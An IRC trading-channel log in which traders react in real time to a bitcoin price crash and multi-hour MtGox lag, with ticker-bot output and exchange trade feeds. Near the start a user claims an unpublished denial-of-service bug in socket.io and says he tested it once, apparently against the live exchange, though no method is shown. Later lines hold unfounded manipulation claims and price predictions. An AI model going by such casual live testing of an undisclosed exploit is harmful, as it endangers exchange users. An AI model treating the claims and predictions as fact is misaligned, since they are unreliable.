mentioned it here 2 or 3 months ago but havent published it at all Apr 10 21:11:04 Bugpowdurr: then it's a.... 3month Apr 10 21:11:05 so its still 0day Apr 10 21:11:06 YEAAAAAHHHH Apr 10 21:11:07 gesell: /q magicaltux Apr 10 21:11:08 no one has used it Apr 10 21:11:32 no user magicaltux around these parts Apr 10 21:11:35 are you sure? Apr 10 21:12:05 deadweasel: not publically at least and the current dos's are actually DDoS or 1:1 dos. Not crashing the interface, as far as ive hard Apr 10 21:12:07 bitstamp 115 Apr 10 21:12:08 the fuck Apr 10 21:12:10 so no, no one has used it yet Apr 10 21:12:17 he is here, look in #mtgox and check your spelling Apr 10 21:12:33 cant join need +r Apr 10 21:12:47 well /q magicaltux works Apr 10 21:13:27 gesell: to which websocket daemon does that apply? Apr 10 21:14:06 socket.io lib of nodejs Apr 10 21:14:34 i was hoping today would be exciting Apr 10 21:14:40 tested it once, watched it go down and come right back up (meaning there is some mitigation to this) Apr 10 21:15:12 isn't socket.io supposed to fail over to other transport mechanisms? Apr 10 21:15:18 ;;goxlag Apr 10 21:15:19 well, correlation is not causation Apr 10 21:15:20 xhr, flash, etc Apr 10 21:15:20 MtGox lag is 3440.907279 seconds. During this time, light travels 6.8955396608 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 10 21:15:24 download node, set it up and test it Apr 10 21:15:35 i have an instance running right now, and it does fall back to xhr Apr 10 21:16:05 MJR_: fallback has nothing to do with node crashing though Apr 10 21:16:06 Scrat: this is true. im not looking for anything from this but actually the way i and friend came to this was because he was working on a project for google that used the same lib and he found the problem there. so i would just pass it along if possible Apr 10 21:16:33 gesell: I actually use socket.io heavily and I've worked on a pretty big deployment of it last year Apr 10 21:16:35 Scrat: we were able to at least confirm in a local test enviornment that the lib for nodejs has the problem, and could replicate Apr 10 21:16:38 $120 -wtf Apr 10 21:17:02 where is the 120 Apr 10 21:17:57 bitstamp Apr 10 21:18:11 directly on the site ? Apr 10 21:18:15 yes Apr 10 21:18:30 I get the cloudflare Always Up farce Apr 10 21:18:33 518 coins offered 120 Apr 10 21:18:45 it aint a fluke either, been < 130 for the last 20 mins Apr 10 21:18:49 my puts are ITM? Apr 10 21:18:54 neat Apr 10 21:18:57 you sure it is USD? Apr 10 21:18:59 not EUR Apr 10 21:19:08 its usd Apr 10 21:19:24 there were sell orders for ~100$ Apr 10 21:19:34 gox is so annoying Apr 10 21:19:46 gox is causing panic Apr 10 21:19:50 173 gox - new low Apr 10 21:19:51 i know, i love that part Apr 10 21:20:00 blood in the streets Apr 10 21:20:10 i don't care what you give me, just take this NAO Apr 10 21:20:12 oops Apr 10 21:20:18 Well my bids start at $91 Apr 10 21:20:19 hm? Apr 10 21:20:25 120$ indeed on stamps Apr 10 21:21:46 btce 137 Apr 10 21:21:57 [HAVELOCK] [VTX] 9 @ 0.2629 = 2.3661 BTC [-] Apr 10 21:21:59 [HAVELOCK] [VTX] 20 @ 0.284 = 5.68 BTC [+] Apr 10 21:22:00 [HAVELOCK] [VTX] 11 @ 0.3 = 3.3 BTC [+] Apr 10 21:22:20 wow Apr 10 21:22:42 people are realizing how much bitcoins and $ virtex is making Apr 10 21:22:44 i hear a popping sound... Apr 10 21:22:51 especially with gox all fucked up Apr 10 21:23:13 157 gox Apr 10 21:23:56 how can you check gox order book or price? Apr 10 21:24:25 150 Apr 10 21:24:52 pop as in bubble Apr 10 21:24:56 $40 spread Apr 10 21:25:03 wtf is happening Apr 10 21:25:07 anyone want to buy some C302Ts? Apr 10 21:25:23 sure Apr 10 21:25:23 Bugpowder_: how much? Apr 10 21:25:35 only mtgox source right now for me is the stream from bitcoin charts Apr 10 21:25:42 i guess their ticker still works too Apr 10 21:25:47 i'm watching #bitcoin-market Apr 10 21:25:50 https://mtgox.com/api/1/BTCUSD/ticker Apr 10 21:25:58 wow, this is a new test of the market for certain Apr 10 21:26:00 no point in looking at book data, 60min lag Apr 10 21:26:07 good time to shut of the computer :) Apr 10 21:26:09 yea, well this was long overdue Apr 10 21:26:21 for sure Apr 10 21:26:22 ;;ticker Apr 10 21:26:23 BTCUSD ticker | Best bid: 156.01003, Best ask: 180.00000, Bid-ask spread: 23.98997, Last trade: 180.00000, 24 hour volume: 100647.42874735, 24 hour low: 157.00000, 24 hour high: 266.00000, 24 hour vwap: 232.22003 Apr 10 21:26:28 150 will be hard to break Apr 10 21:26:30 if you look at a 240m chart it doesnt look that bad, considering the steep upmove Apr 10 21:26:33 what pisses me off Apr 10 21:26:35 100 impossiburu? Apr 10 21:26:38 that i bought in back at 250 Apr 10 21:26:39 whoops, there went the bitfloor book again... Apr 10 21:26:43 after selling at 220 Apr 10 21:26:54 taub: you are in good company. i purchased some new coin at 250 as well Apr 10 21:27:00 105 on stamp Apr 10 21:27:13 btce130 Apr 10 21:27:34 not much but. whatevs Apr 10 21:28:00 bitfloor back - 150 Apr 10 21:28:03 goxlag is just compounding this crash... Apr 10 21:28:10 yep Apr 10 21:28:19 hope they all sell already and go away Apr 10 21:28:20 150? Nah, going to fall like flies Apr 10 21:28:21 ;;ticker Apr 10 21:28:22 wake me when gox hits 149 Apr 10 21:28:24 BTCUSD ticker | Best bid: 156.01003, Best ask: 180.00000, Bid-ask spread: 23.98997, Last trade: 156.01003, 24 hour volume: 100861.53781031, 24 hour low: 156.01003, 24 hour high: 266.00000, 24 hour vwap: 231.92817 Apr 10 21:28:29 whoever sees tux can tell him that gox leeched ~5mn dollars off the community this month. Apr 10 21:28:31 being hit by an explosion Apr 10 21:28:37 100 on bitstamp Apr 10 21:28:40 Bugpowder_: are you sure the wall at 150 is real? Apr 10 21:28:40 for the privilege of fucking it over. Apr 10 21:28:42 Bugpowder_: it's already ay 156 Apr 10 21:28:58 lol fuck Apr 10 21:29:00 118 on bitfloor Apr 10 21:29:03 i'm seeing 109 on bitfloor Apr 10 21:29:04 109 Apr 10 21:29:17 holy mother of god! Apr 10 21:29:20 buy buy buy Apr 10 21:29:27 crazy shit Apr 10 21:29:35 yep Apr 10 21:29:41 lol Apr 10 21:29:45 and now back to 148 Apr 10 21:29:48 dumbassses Apr 10 21:30:09 yea Apr 10 21:30:13 its funny that they think of limit orders as "too advanced" but i think the market order should come with two warnings Apr 10 21:30:15 looks like i caught the wrong end of this Apr 10 21:30:16 82EUR Apr 10 21:30:16 where's that quote where i say "every dollar over 100 is a dollar lost "? Apr 10 21:30:20 fug Apr 10 21:30:23 ;;ticker Apr 10 21:30:25 BTCUSD ticker | Best bid: 170.00000, Best ask: 180.00000, Bid-ask spread: 10.00000, Last trade: 180.00000, 24 hour volume: 100861.53781031, 24 hour low: 156.01003, 24 hour high: 266.00000, 24 hour vwap: 231.92817 Apr 10 21:30:27 anyone, what happen to the huge lower buy walls that were there about 30 minutes before the crash? Apr 10 21:30:33 were they removed, soaked up? Apr 10 21:30:35 i wonder what max kaiser is spouting now Apr 10 21:30:49 i wonder when cnbc is pick up this story... Apr 10 21:30:55 lol Apr 10 21:31:03 Max Kaiser has cashed out already and is wondering what else he's going to pump & dump now? Apr 10 21:31:03 oh his twitter has been slient for 4 h :D Apr 10 21:31:15 lol yea Apr 10 21:31:31 eh, all this day to day is silly anyway, 100k or 0... Apr 10 21:31:44 but i appreciate the buying opportunity Apr 10 21:31:53 yea exactly Apr 10 21:31:57 agree Apr 10 21:31:58 im not concerned long run Apr 10 21:32:01 exactly Apr 10 21:32:07 ;;ticker Apr 10 21:32:08 BTCUSD ticker | Best bid: 181.00000, Best ask: 195.00000, Bid-ask spread: 14.00000, Last trade: 175.00000, 24 hour volume: 100987.02516697, 24 hour low: 156.01003, 24 hour high: 266.00000, 24 hour vwap: 231.76704 Apr 10 21:32:14 but i want to use opportunities to aquire more coins Apr 10 21:32:17 def Apr 10 21:32:22 so far i missed a big one here Apr 10 21:32:41 I think amphipod lost the gox stream Apr 10 21:32:41 ah cuz you didn't get out and get back in? there will be many more crashes in the future Apr 10 21:32:44 jurov where arrrrrrrre you Apr 10 21:32:49 190 gox Apr 10 21:32:52 78$ stamp Apr 10 21:32:56 buy time Apr 10 21:32:57 just saw it Apr 10 21:33:03 nvmd Apr 10 21:33:06 lol 80 Apr 10 21:33:07 rallying on bitfloor Apr 10 21:33:07 if i can get the page to load up Apr 10 21:33:12 155 now Apr 10 21:33:17 after touching 108 Apr 10 21:33:18 btce back up to 160 Apr 10 21:33:28 price is between 80 and 200 rite now Apr 10 21:33:41 Apr 03 14:11:19 getting tempted of shaving of a bit Apr 10 21:33:41 Apr 03 14:11:22 and when they finally panic they'll expect actual players to buy from them. Apr 10 21:33:41 Apr 03 14:11:25 it won't happen over 100. Apr 10 21:33:41 Apr 03 14:11:37 so basicvally... any dollar over 100 anyone pays on a btc is a dollar lost. Apr 10 21:33:43 kakobrekla i think between 0 and 80k Apr 10 21:33:48 's mug in it Apr 10 21:33:53 btc e 175 Apr 10 21:34:10 182 bitfloor Apr 10 21:34:12 lol Apr 10 21:34:17 I sold at 250 luckily... Apr 10 21:34:20 guess the dump and buy is done huh? Apr 10 21:34:50 see $78 Apr 10 21:34:51 btc e 190 Apr 10 21:34:52 at stamp Apr 10 21:34:52 would like to see the lag down before calling it done Apr 10 21:34:58 yeah Apr 10 21:35:00 ;;goxlag Apr 10 21:35:01 MtGox lag is 4304.957932 seconds. During this time, light travels 8.62708749502 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 10 21:35:12 YAY we made it past jupiter! Apr 10 21:35:16 bitstamp is at $78 Apr 10 21:35:19 lol Apr 10 21:35:27 if we slingshot, we could have made it past saturn Apr 10 21:35:29 like i said, what happen to the 2 huge near $1m buy walls about $5 and $15 below market price that were there about 30 min before the crash? Apr 10 21:35:32 jk Apr 10 21:35:40 funny world Apr 10 21:36:06 gesell: i would imagine that once they cleared the book, they pulled those and then watched it sink Apr 10 21:36:27 simply market manipulation Apr 10 21:36:35 $50 spread on the gox now Apr 10 21:36:39 MJR_: yeah I'm not sure. Wouldnt assume that yet, unless someone saw them when they were up, and saw them removed just before the crash Apr 10 21:37:00 http://images.4chan.org/pol/src/1365618292494.png Apr 10 21:37:03 gesell: i wasn't watching them, but absolutely nothing changed since yesterday and today Apr 10 21:37:16 if anything, i think this is someone very bullish, who just didn't want to pay full price Apr 10 21:37:24 perhaps a big fund or something Apr 10 21:37:44 back to 195 Apr 10 21:37:52 not so fast! Apr 10 21:37:58 i just bought at 78 at stamp Apr 10 21:37:58 this was people that were smart enoug to realize 265 was a ridic price Apr 10 21:38:00 on bitfloor it just ticked at 195 Apr 10 21:38:00 second chance to sell Apr 10 21:38:21 kakobrekla: why ridiculous? Apr 10 21:38:33 wha? Apr 10 21:38:33 i think in the grand scheme of things, it'll look cheap at 10x that Apr 10 21:38:35 somebody tell those buys that the crash is over... Apr 10 21:38:42 MJR_ i didnt say dat :p Apr 10 21:38:50 ridic because of the parabolic rise Apr 10 21:39:01 eh, picture ten years in the future Apr 10 21:39:06 ;;goxlag Apr 10 21:39:06 no thanks Apr 10 21:39:08 MtGox lag is 4530.11715 seconds. During this time, light travels 9.07830404688 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 10 21:39:12 and put that against a $265 betg Apr 10 21:39:33 i don't care about the $265, so it actually really doesn't matter what price i pay Apr 10 21:39:39 youre nuts if you think 10 years will paint a totally new landscape Apr 10 21:39:40 nice kakobrekla Apr 10 21:39:40 too far, too fast... Apr 10 21:39:46 wont Apr 10 21:39:51 ThickAsThieves: the world will be unrecognizable Apr 10 21:40:14 i want to go drink some tears from redditors...brb Apr 10 21:40:49 back UP :) to 96 Apr 10 21:40:54 ;;ticker Apr 10 21:40:57 BTCUSD ticker | Best bid: 172.00000, Best ask: 190.97000, Bid-ask spread: 18.97000, Last trade: 190.97000, 24 hour volume: 101854.75453118, 24 hour low: 150.00000, 24 hour high: 266.00000, 24 hour vwap: 229.94480 Apr 10 21:41:02 150 low Apr 10 21:41:10 we just hit a few moments ago Apr 10 21:41:13 ugh people are so amazingly stupid Apr 10 21:41:20 on stamp I meant Apr 10 21:41:36 lemmings Apr 10 21:41:39 ;;ticker Apr 10 21:41:50 $70 low at bitstamp Apr 10 21:41:56 BTCUSD ticker | Best bid: 180.00000, Best ask: 190.97000, Bid-ask spread: 10.97000, Last trade: 180.00000, 24 hour volume: 101854.75453118, 24 hour low: 150.00000, 24 hour high: 266.00000, 24 hour vwap: 229.94480 Apr 10 21:41:56 with crazy market orders, you get ticks at 197 and then 150 Apr 10 21:42:11 bitcoinity back up Apr 10 21:42:26 LOL just saw 224 on bitfloor Apr 10 21:42:28 hhehehe Apr 10 21:43:15 30 point spread on bitfloor Apr 10 21:43:44 i hope everyone switches to bitfloor or something Apr 10 21:43:48 mtgox is done after this Apr 10 21:43:49 it has to b Apr 10 21:43:51 gox 165 Apr 10 21:44:15 taub: sadly no. stockholm syndrome Apr 10 21:44:20 might as well go to bed, nothing gonna happen Apr 10 21:44:30 taub it won't be Apr 10 21:44:32 price will clime back into 220-240 area Apr 10 21:44:39 and then drop again Apr 10 21:45:29 (i hope) Apr 10 21:45:41 get 'em cheap! Apr 10 21:45:58 [HAVELOCK] [VTX] 1 @ 0.235 BTC [-] Apr 10 21:46:28 this is over... Apr 10 21:46:49 gox 150 Apr 10 21:46:58 ;;ticker Apr 10 21:46:59 BTCUSD ticker | Best bid: 160.00000, Best ask: 177.98034, Bid-ask spread: 17.98034, Last trade: 177.98034, 24 hour volume: 102458.74013324, 24 hour low: 150.00000, 24 hour high: 266.00000, 24 hour vwap: 229.49595 Apr 10 21:47:10 lol, what did you do?!?! Apr 10 21:47:15 haha Apr 10 21:47:41 I'd give Kraken a try but the fact they have Lorem Ipsum text on their homepage isn't encouraging Apr 10 21:47:57 [HAVELOCK] [VTX] 1 @ 0.29 BTC [+] Apr 10 21:48:14 kraken isn't live yet Apr 10 21:48:20 its just beta with fake money Apr 10 21:48:23 ;;goxlag Apr 10 21:48:24 MtGox lag is 4497.755235 seconds. During this time, light travels 9.01345113156 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 10 21:48:50 ;;ticker Apr 10 21:48:50 ahhhh i see taub ok Apr 10 21:48:51 BTCUSD ticker | Best bid: 159.02439, Best ask: 190.00000, Bid-ask spread: 30.97561, Last trade: 159.02439, 24 hour volume: 103170.69059839, 24 hour low: 150.00000, 24 hour high: 266.00000, 24 hour vwap: 228.83195 Apr 10 21:48:57 [HAVELOCK] [VTX] 1 @ 0.29 BTC [+] Apr 10 21:48:59 If it gets past Pluto I think we are screwed Apr 10 21:49:00 fuckin' spread! Apr 10 21:49:23 ticket to cluetrain plz? did anything in particular blow up? Apr 10 21:49:29 benkay mtgox. Apr 10 21:49:38 is that result or cause Apr 10 21:49:45 that is result and cause. Apr 10 21:49:54 stinky. Apr 10 21:50:03 chicken and egg Apr 10 21:50:05 four thousand second lag. Apr 10 21:50:07 bitstamp $200? Apr 10 21:50:14 lol Apr 10 21:50:27 http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 10 21:50:29 ;;goxlag Apr 10 21:50:30 MtGox lag is 4375.270055 seconds. During this time, light travels 8.76799220226 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 10 21:50:33 doesn't that look pretty. Apr 10 21:50:34 their matching engine is totally fubar right now... Apr 10 21:50:57 we're gonna break 150 Apr 10 21:51:25 then more unpleasantness... Apr 10 21:51:46 988.13 a few seconds ago 150.00 Apr 10 21:51:48 heh Apr 10 21:51:49 149 Apr 10 21:52:01 ;;ticker Apr 10 21:52:05 BTCUSD ticker | Best bid: 142.00000, Best ask: 149.00000, Bid-ask spread: 7.00000, Last trade: 142.00000, 24 hour volume: 103170.69059839, 24 hour low: 150.00000, 24 hour high: 266.00000, 24 hour vwap: 228.83195 Apr 10 21:52:10 YEEHAA Apr 10 21:52:19 cool Apr 10 21:52:22 cheap coins foar me Apr 10 21:52:26 ohshizzle Apr 10 21:52:29 I think mp is smiling right now Apr 10 21:52:48 like mana from the heavens Apr 10 21:52:56 i am just holding up a "told you so" card. Apr 10 21:53:03 next time listen bettar, all. Apr 10 21:53:47 mpoe bond holders gonna have a good month afterall? Apr 10 21:53:52 lol Apr 10 21:54:10 the month is not over yet Apr 10 21:54:15 exactly Apr 10 21:54:27 gonna sleep, cya in 5 hours Apr 10 21:54:32 many people will still able to excercise at a profit Apr 10 21:54:34 i'll post a report jus' as soon as the month's done. Apr 10 21:54:36 still 16 days until options expiration Apr 10 21:54:48 were* Apr 10 21:55:29 mircea_popescu will you be offering longer term options? Apr 10 21:55:53 just as soon as a majority of the trade happens on N month Apr 10 21:55:57 i'll offer further out. Apr 10 21:56:15 all those fools that took out loans just to buy at 250 rofl Apr 10 21:56:22 ouch Apr 10 21:56:26 142 Apr 10 21:56:27 max keiser told them Apr 10 21:56:47 i wonder what he'll say to this haaa Apr 10 21:56:50 NAKED SHORTS Apr 10 21:56:54 lol Apr 10 21:57:09 hmm i'm seeing a couple problems with my coinbr excercisings Apr 10 21:57:19 got 0 back from things that shouldnt have been total losses Apr 10 21:57:22 140 Apr 10 21:58:11 I wonder how badly bitfinex fared - lots of margin selling into non-existent market Apr 10 21:58:14 what do y'all anticipate the market to bottom out at? Apr 10 21:58:24 70-100 Apr 10 21:58:34 below 100 Apr 10 21:58:49 100 Apr 10 21:59:10 and expected 'retrace' (i think is the correct word?) Apr 10 21:59:14 ? Apr 10 21:59:28 not like it's a term of art. Apr 10 21:59:36 so how are you guys doing Apr 10 21:59:50 i thought we were taking it over 9000 for sure Apr 10 21:59:55 njo retraces Apr 10 21:59:55 mtgox x25 18.6796 @ 127.54566208 USD Apr 10 22:00:08 yikes Apr 10 22:00:14 perfect op to buy Apr 10 22:00:30 I hope my bids get hit Apr 10 22:00:43 now that we see $100 swings are feasible there's actual money to be made Apr 10 22:00:48 ;;ticker Apr 10 22:00:49 BTCUSD ticker | Best bid: 125.00000, Best ask: 156.92398, Bid-ask spread: 31.92398, Last trade: 125.00000, 24 hour volume: 107629.21996269, 24 hour low: 126.00000, 24 hour high: 266.00000, 24 hour vwap: 223.42581 Apr 10 22:00:54 oooo Apr 10 22:01:04 dat spread Apr 10 22:01:10 jcpham: yes, very easy if you have direct access to the engine Apr 10 22:01:15 and noone will notice Apr 10 22:01:23 bugpowder: 91 your number? Apr 10 22:02:23 you could fly a dreamline throught that spread... ridiculous... Apr 10 22:03:20 $avg Apr 10 22:03:22 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 22:03:29 ;;bc,24hprc Apr 10 22:03:38 227.18 Apr 10 22:03:56 120 Apr 10 22:04:22 lol Apr 10 22:04:33 and coinlab has no data at all... Apr 10 22:05:24 and some guy bought on bitfloor at 197... lol Apr 10 22:05:52 where are the "adults"? Apr 10 22:05:53 Anyone have speculated any particular reason why Bitcoin went down so rapiply.. Or is is just another expected correction to price that has raised too rapidly? Apr 10 22:06:03 gox better not run out of cash Apr 10 22:06:11 MY CASH Apr 10 22:06:33 Bert__: Max Keiser Apr 10 22:07:09 Where's mircea? Are we under attack? Apr 10 22:07:15 Feels like it Apr 10 22:07:27 "attack"? Apr 10 22:07:34 we're under attack Apr 10 22:07:39 in the sense that idiots promote idiots Apr 10 22:07:45 and then idiots do their idiotic thing Apr 10 22:07:49 lol Apr 10 22:07:49 and then we wonder if we're under attack. Apr 10 22:07:56 yes, we are. DO NOT USE MTGOX Apr 10 22:08:04 then you won't have to ask me if we're under attack. Apr 10 22:08:29 this publicity campaign again. Apr 10 22:08:36 ;) Apr 10 22:08:46 be fearful when others are greedy, and greedy when others are fearful Apr 10 22:09:14 yea, yea. publicity campaign. sure. Apr 10 22:09:14 Mp, did you push the big red button? lol Apr 10 22:09:25 good book: reminiscences of a stock operator Apr 10 22:09:31 all the major sites are unresponsive - ddos or just traffic? Apr 10 22:09:33 I'VE got my finger on the button Apr 10 22:09:56 [HAVELOCK] [VTX] 1 @ 0.29 BTC [+] Apr 10 22:09:57 lets hit 91 please Apr 10 22:10:03 or 32 Apr 10 22:10:10 scottjp: ever see a bunch of fat guys try to go through the same doorway at the same time? Apr 10 22:10:17 117 Apr 10 22:10:28 [MPEX] [S.DICE] 1 @ 0.0027 BTC [-] Apr 10 22:10:31 scottjp all the minor sites (ie, everything other than mpex) just plain sucks. Apr 10 22:10:47 Is it me or we'll get a VERY good month for S.MPOE? Apr 10 22:10:55 I think most people were holding calls... Apr 10 22:10:59 there wasn't that much options action Apr 10 22:11:04 TBH Apr 10 22:11:06 yeah, was I the only one that still had puts? Apr 10 22:11:18 Namworld: did you stop buying puts? Apr 10 22:11:18 Namworld it was about half calls half puts as i pointed out to jurov / he wanted to quote on the forum etc. Apr 10 22:11:42 well, they're listed now ... Apr 10 22:12:55 ;;goxlag Apr 10 22:12:56 MtGox lag is 3858.490312 seconds. During this time, light travels 7.73237138344 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 10 22:12:57 [HAVELOCK] [VTX] 2 @ 0.29 = 0.58 BTC [+] Apr 10 22:13:10 ;;calc 3858/60 Apr 10 22:13:11 64.3 Apr 10 22:13:16 does this market even do price discovery with that much trading latency? Apr 10 22:13:24 hope it drives some noobs out Apr 10 22:13:25 ;;ticker Apr 10 22:13:25 BTCUSD ticker | Best bid: 116.00000, Best ask: 150.00000, Bid-ask spread: 34.00000, Last trade: 116.00000, 24 hour volume: 110659.55530272, 24 hour low: 116.00000, 24 hour high: 266.00000, 24 hour vwap: 220.40982 Apr 10 22:13:34 FabianB_: it will Apr 10 22:13:54 benkay: not really Apr 10 22:13:59 look at spread Apr 10 22:14:08 ;;ticker Apr 10 22:14:09 BTCUSD ticker | Best bid: 127.21951, Best ask: 133.38538, Bid-ask spread: 6.16587, Last trade: 150.00000, 24 hour volume: 110659.55530272, 24 hour low: 116.00000, 24 hour high: 266.00000, 24 hour vwap: 220.40982 Apr 10 22:14:21 oh... spread narrowed Apr 10 22:14:27 was like 40 Apr 10 22:14:28 how do you check the time stamp of the lowest trade? Apr 10 22:14:56 ;;goxlag Apr 10 22:14:58 MtGox lag is 3854.391173 seconds. During this time, light travels 7.72415675478 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 10 22:15:20 data is an hour old Apr 10 22:15:25 ;;goxlag Apr 10 22:15:27 MtGox lag is 3847.828407 seconds. During this time, light travels 7.71100504519 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 10 22:15:28 btce 124 Apr 10 22:15:57 <+amphipod> Apr10 19:14:55 mtgox x3 13.8943 @ 112.35606189 USD Apr 10 22:16:44 As I see it - we have broken into the mainstream ever so slightly and our systems don't hold up. This is part of the process I guess - this will help us improve - but it's pretty embarrassing Apr 10 22:17:15 porngo.at handled the load like a champ Apr 10 22:17:16 fuck ya, it's embarassing... Apr 10 22:18:51 gox won even let me place an ask Apr 10 22:19:07 yesterday, I was having cocktails with VCs and everyone wants to talk to me about bitcoins - after today, they won't even recognize me Apr 10 22:19:09 button does nothing Apr 10 22:19:14 gox 109 Apr 10 22:19:32 pgp i hope you mentioned to them about the manipulation Apr 10 22:19:33 may 50 is the bottom? Apr 10 22:19:36 maybe Apr 10 22:19:37 ... Apr 10 22:19:43 you guys are trading with the past right now Apr 10 22:19:47 by max kaiser? Apr 10 22:19:49 ;;ticker Apr 10 22:19:49 market orders from an hour ago Apr 10 22:19:50 BTCUSD ticker | Best bid: 110.00000, Best ask: 149.07778, Bid-ask spread: 39.07778, Last trade: 149.07778, 24 hour volume: 111779.96618126, 24 hour low: 111.24300, 24 hour high: 266.00000, 24 hour vwap: 219.22259 Apr 10 22:20:01 ;;goxlag Apr 10 22:20:02 MtGox lag is 3401.086096 seconds. During this time, light travels 6.81573845593 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 10 22:20:11 ijs if you are talking to money you should understand the market is heavily manipulated Apr 10 22:20:15 in more ways than one Apr 10 22:20:38 the money needs to know someone can make a power play daily Apr 10 22:20:43 bitfloor is holding steady at 155 Apr 10 22:20:45 Anyone have a list of sites that take payment based on the 24 hour average? Apr 10 22:20:55 or even better, they can make power plays daily Apr 10 22:20:59 nothing different than fiat markets Apr 10 22:21:02 lmao at this feed Apr 10 22:21:02 yes, that too Apr 10 22:21:08 buys at 156 followed by sells at 125 Apr 10 22:21:20 try 107 Apr 10 22:21:22 laughable Apr 10 22:21:24 mircea_popescu: yaaay lag! Apr 10 22:21:30 thats why market orders are pretty dumb in a supper laggy shit engine Apr 10 22:21:32 the great bubble Apr 10 22:21:42 what a crazy day! Apr 10 22:21:46 how many bubbles will we see though Apr 10 22:21:50 many Apr 10 22:21:52 i'm guessing i'll get a good price in an hour from now Apr 10 22:21:52 and whats this I heard about gox limiting orders to 100 at a time? Apr 10 22:21:56 bitcoin is like an economics history in hyperdrive Apr 10 22:22:02 MJR_ there's two things biotcoin investors are too smart for : mpex and limit orders. Apr 10 22:22:02 that was supposed to go into effect today? Apr 10 22:22:03 which bubble was today Apr 10 22:22:04 bless their souls. Apr 10 22:22:13 hi evoorhees Apr 10 22:22:21 you just lost 100mn dollah bro. Apr 10 22:22:23 hey evoorhees Apr 10 22:22:31 i lost two. Apr 10 22:22:40 a hundred million huh? :) Apr 10 22:22:44 yeah. totally. Apr 10 22:23:04 well then I will have an awesome capital loss deduction on my taxes Apr 10 22:23:06 ;;bids 0 Apr 10 22:23:06 There are currently 42631227 bitcoins demanded at or over 0.0 USD, worth 6143603.12416 USD in total. | Data vintage: 32.8264 seconds Apr 10 22:23:11 hahahahaha Apr 10 22:23:14 this i great Apr 10 22:23:15 "hello irs ? yes this is dog" Apr 10 22:23:16 is Apr 10 22:23:31 150, 122, 150, 122... Apr 10 22:24:02 160 bitfloor Apr 10 22:24:19 i'm gonna get back to coding, i'll check back in a few hours Apr 10 22:24:53 well if one is a believer, this could become a great opportunity… to pick up more coins Apr 10 22:24:56 [HAVELOCK] [SDICE] 5 @ 0.27 = 1.35 BTC [+] Apr 10 22:24:57 [HAVELOCK] [SDICE] 2 @ 0.28649 = 0.573 BTC [+] Apr 10 22:24:58 yep Apr 10 22:24:58 [HAVELOCK] [SDICE] 1 @ 0.2864999 BTC [+] Apr 10 22:24:59 [HAVELOCK] [SDICE] 2 @ 0.2865 = 0.573 BTC [+] Apr 10 22:25:00 [HAVELOCK] [SDICE] 2 @ 0.2867 = 0.5734 BTC [+] Apr 10 22:25:01 [HAVELOCK] [SDICE] 1 @ 0.287 BTC [+] Apr 10 22:25:02 [HAVELOCK] [SDICE] 2 @ 0.287 = 0.574 BTC [+] Apr 10 22:25:02 this shit *is* distracting - that's for sure... Apr 10 22:25:03 [HAVELOCK] [SDICE] 12 @ 0.2875 = 3.45 BTC [+] Apr 10 22:25:03 [HAVELOCK] [SDICE] 2 @ 0.288 = 0.576 BTC [+] Apr 10 22:25:04 [HAVELOCK] [SDICE] 3 @ 0.2898 = 0.8694 BTC [+] Apr 10 22:25:05 [HAVELOCK] [SDICE] 2 @ 0.29 = 0.58 BTC [+] Apr 10 22:25:06 [HAVELOCK] [SDICE] 2 @ 0.294 = 0.588 BTC [+] Apr 10 22:25:07 [HAVELOCK] [SDICE] 18 @ 0.298 = 5.364 BTC [+] Apr 10 22:25:08 [HAVELOCK] [SDICE] 23 @ 0.299 = 6.877 BTC [+] Apr 10 22:25:16 nice! s.dice rally Apr 10 22:25:30 in expectation of people dumping coins cuz of crash? Apr 10 22:25:35 well pgp this is the most important thing in our generation, its hard not to pay attention. Apr 10 22:25:37 If it hits 50, I will sell some things that I don't really want to part with to take a larger btc position Apr 10 22:26:00 im glue'd as well :] Apr 10 22:26:33 106 Apr 10 22:27:11 looks like the first wave of buys are starting to hit Apr 10 22:27:16 so who else made bank today, other than magicaltux Apr 10 22:27:25 I hope there is still one 20000 BTC market sell waiting to hit. Apr 10 22:27:36 before the bounce Apr 10 22:27:40 yep - glued - soon to be enjoyed with a drink in hand - it's five o'clock somewhere, right? Apr 10 22:27:50 haha, it sure is Apr 10 22:27:52 [BTCTC] [BASIC-MINING] 6 @ 0.37103 = 2.2262 BTC [-] Apr 10 22:28:05 I can't even get an order through gox... Apr 10 22:28:08 just hit 91 plz Apr 10 22:28:14 Can't bounce if people can't buy. Apr 10 22:28:16 and bitcoin will live to fight another day Apr 10 22:28:47 [MPEX] [S.DICE] 695 @ 0.00319 = 2.2171 BTC [+] Apr 10 22:28:49 [MPEX] [S.DICE] 5000 @ 0.003195 = 15.975 BTC [+] Apr 10 22:29:09 bitstamp seems to be normalized at 122 Apr 10 22:29:11 [BTCTC] [BASIC-MINING] 13 @ 0.37102 = 4.8233 BTC [-] Apr 10 22:31:11 [BTCTC] [ASICMINER-PT] 1 @ 0.7342 BTC [-] Apr 10 22:31:14 [BTCTC] [ASICMINER-PT] 1 @ 0.732 BTC [-] Apr 10 22:31:16 do limit orders work on bitstamp? Apr 10 22:31:16 [BTCTC] [ASICMINER-PT] 1 @ 0.7313 BTC [-] Apr 10 22:31:18 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [-] Apr 10 22:31:28 [BTCTC] [ASICMINER-PT] 1 @ 0.727 BTC [-] Apr 10 22:31:32 [BTCTC] [ASICMINER-PT] 2 @ 0.702 = 1.404 BTC [-] Apr 10 22:31:34 yep thats my point, we are watching a farce play out, but we can't intervene Apr 10 22:31:42 [BTCTC] [ASICMINER-PT] 5 @ 0.7013 = 3.5065 BTC [-] Apr 10 22:31:47 [BTCTC] [ASICMINER-PT] 1 @ 0.70014 BTC [-] Apr 10 22:31:50 [BTCTC] [ASICMINER-PT] 13 @ 0.7001 = 9.1013 BTC [-] Apr 10 22:31:53 its like watching a distant galaxy's war...its already been done Apr 10 22:32:02 ;;goxlag Apr 10 22:32:02 MtGox 